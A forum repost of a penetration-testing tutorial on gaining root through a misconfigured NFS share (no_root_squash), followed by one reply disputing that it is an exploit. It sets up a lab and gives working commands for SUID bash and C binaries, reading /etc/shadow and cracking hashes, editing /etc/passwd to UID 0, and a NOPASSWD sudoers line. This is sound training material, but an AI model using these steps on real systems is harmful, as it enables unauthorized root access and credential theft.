Jump to content
Fi8sVrs

Linux Privilege Escalation using Misconfigured NFS

Recommended Posts

  • Active Members
Posted

After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn how to exploit a misconfigured NFS share to gain root access to a remote host machine.

 

Table of contents

Introduction of NFS

Misconfigured NFS Lab setup

Scanning NFS shares

  • Nmap script
  • showmount

Exploiting NFS server for Privilege Escalation via:

Bash file

C program file

Nano/vi

  • Obtain shadow file
  • Obtain passwd file
  • Obtain sudoers file

 

Let’s Start!!

Network File System (NFS): Network File System permits a user on a client machine to mount the shared files or directories over a network. NFS uses Remote Procedure Calls (RPC) to route requests between clients and servers. Although NFS uses TCP/UDP port 2049 for sharing any files/directories over a network.

 

Misconfigured NFS Lab setup

Basically, there are three core configuration files (/etc/exports, /etc/hosts.allow, and /etc/hosts.deny) you will need to configure to set up an NFS server. BUT to configure weak NFS server we will look only /etc/export file.

To install NFS service execute below command in your terminal and open /etc/export file for configuration.

sudo apt-get update
sudo apt install nfs-kernel-server
nano /etc/exports

The /etc/exports file holds a record for each directory that you expect to share within a network machine. Each record describes how one directory or file is shared. 

Apply basic syntax for configuration:

Directory         Host-IP(Option-list)

 

There are various options will define which type of Privilege that machine will have over shared directory.

  • rw: Permit clients to read as well as write access to shared directory.
  • ro: Permit clients to Read-only access to shared directory..
  • root_squash: This option Prevents file request made by user root on the client machine because NFS shares change the root user to the nfsnobody user, which is an unprivileged user account.
  • no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implication.
  • async: It will speed up transfers but can cause data corruption as NFS server doesn’t wait for the complete write operation to be finished on the stable storage, before replying to the client.
  • sync:   The sync option does the inverse of async option where the NFS server will reply to the client only after the data is finally written to the stable storage.

2.png

 

Hopefully, it might be clear to you, how to configure the /etc/export file by using a particular option. An NFS system is considered weak or Misconfigured when following entry/record is edit into it for sharing any directory.

/home       *(rw,no_root_squash)

Above entry shows that we have shared /home directory and allowed the root user on the client to access files to read/ write operation and * sign denotes connection from any Host machine. After then restart the service with help of the following command.

sudo /etc/init.d/nfs-kernel-server restart

3.png

Scanning NFS shares

Nmap

You can take help of Nmap script to scan NFS service in target network because it reveals the name of share directory of target’s system if port 2049 is opened.

nmap -sV --script=nfs-showmount 192.168.1.102

4.png

 

Basically nmap exports showmount -e command to identify the shared directory and here we can clearly observe /home * is shared directory for everyone in the network.

 

Showmount

The same thing can be done manually by using showmount command but for that install nfs-common package on your local machine with help of the following command.

apt-get install nfs-common
showmount -e 192.168.1.102

5.png

 

Exploiting NFS server for Privilege Escalation

Bash file

Now execute below command on your local machine to exploit NFS server for root privilege.

mkdir /tmp/raj
mount -t nfs 192.168.1.102:/home /tmp/raj
cp /bin/bash .
chmod +s bash
ls -la bash

Above command will create a new folder raj inside /tmp and mount shared directory /home inside /tmp/raj. Then upload a local exploit to gain root by copying bin/bash and set suid permission.

6.png

Use df -h command to get summary of the amount of free disk space on each mounted disk.

7.png

First, you need to compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh. Now we knew that /home is shared directory, therefore, move inside it and follow below steps to get root access of victim’s machine.

cd /home
ls
./bash -p
id
whoami

So, it was the first method to pwn the root access with help of bin/bash if NFS system is configured weak. 

8.png

 

C Program

Similarly, we can use C language program file for root privilege escalation. We have generated a C-Program file and copied it into /tmp/raj folder. Since it is c program file therefore first we need to compile it and then set suid permission as done above.

cp asroot.c /tmp/root
cd /tmp/raj
gcc asroot.c -o shell
chmod +s shell

9.png

Now repeat the above process and run shell file to obtained root access.

cd /home
ls
./shell
id
whoami

 So, it was the second method to pwn the root access with help of bin/bash via c-program if NFS system is misconfigured. 

10.png

 

Nano/Vi

Nano and vi editor both are most dangerous applications that can lead to privilege escalation if share directly or indirectly. In our case, it not shared directly but still, we can use any application for exploiting root access.

Follow below steps:

cp /bin/nano
chmod 4777 nano
ls -la nano

11.png

Since we have set suid permission to nano therefore after compromising target’s machine at least once we can escalate root privilege through various techniques.

cd /home
ls
./nano -p etc/shadow

12.png

When you will execute above command it will open shadow file, from where you can copy the hash password of any user.

13.png

Here I have copied hash password of the user: raj in a text file and saved as shadow then use john the ripper to crack that hash password.

Awesome!!! It tells raj having password 123. Now either you can login as raj and verify its privilege or follow next step.

14.png

 

Passwd file

Now we know the password of raj user but we are not sure that raj has root privilege or not, therefore, we can add raj into the root group by editing etc/passwd file.

16.png

Open the passwd file with help of nano and make following changes

./nano -p etc/passwd
raj:x:0:0:,,,:/home/raj:/bin/bash

17.png

Now use su command to switch user and enter the password found for raj.

su raj
id
whoami

Great!!! This was another way to get root access to target’s machine.

18.png

 

Sudoers file

We can also escalate root privilege by editing sudoers file where we can assign ALL privilege to our non-root user (ignite).

19.png

Open the sudoers file with help of nano and make following changes

./nano -p etc/sudoers
ignite ALL=(ALL:ALL) NOPASSWD: ALL

20.png

Now use sudo bash command to access root terminal and get root privilege

sudo bash
id
whoami

21.png

 

Conclusion: Thus we saw the various approach to escalated root privilege if port 2049 is open for NFS services and server is weak configured. For your practice, you can play with ORCUS which is a vulnerable lab of vulnhub and read the article from here.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

 

Source: hackingarticles.in

  • Upvote 1
Posted

Asta nu este nici un "exploit", este pur si simplu ca asa l-ai configurat tu.

 

Atata timp cat pui no_root_squash specifici sistemului sa iti lase ownerul in pace. Nu este o setare default.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...